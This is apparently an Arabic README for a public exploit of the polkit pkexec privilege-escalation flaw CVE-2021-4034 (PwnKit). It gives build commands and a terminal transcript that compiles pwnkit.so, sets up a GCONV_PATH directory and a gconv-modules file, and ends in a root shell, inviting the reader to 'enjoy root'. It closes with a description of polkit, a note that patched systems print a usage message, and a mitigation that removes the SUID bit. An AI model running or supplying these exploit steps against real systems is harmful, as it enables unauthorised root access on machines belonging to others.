
استغلال لثغرة CVE-2021-4034 في polkit pkexec، يوفر شل صلاحيات الجذر عبر تصعيد الامتيازات SUID. يتضمن الكود المصدري وتعليمات البناء.
استغلال تصعيد الامتيازات في polkit
فقط نفّذ make، ثم ./cve-2021-4034 واستمتع بجذر (root shell).
النشرة الأصلية من فريق Qualys الخاص بي هنا
إذا كان الاستغلال يعمل، ستحصل على جذر (root shell) فورًا:
kali@user:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
kali@user:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit
تحديث polkit على معظم الأنظمة سيصلح الثغرة، لذلك ستحصل على رسالة الاستخدام وسيخرج البرنامج:
kali@user:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
kali@user:~/CVE-2021-4034$
Polkit (المعروف سابقًا باسم PolicyKit) هو مكوّن للتحكم في الامتيازات على مستوى النظام في أنظمة التشغيل الشبيهة بـ Unix. يوفر طريقة منظمة للعمليات غير المميزة للتواصل مع العمليات المميزة. من الممكن أيضًا استخدام polkit لتنفيذ الأوامر بامتيازات مرتفعة باستخدام الأمر pkexec متبوعًا بالأمر المطلوب تنفيذه (بصلاحية الجذر).
إذا لم تتوفر تصحيحات لنظام التشغيل الخاص بك، يمكنك إزالة بت SUID من pkexec كإجراء تخفيف مؤقت.
# chmod 0755 /usr/bin/pkexec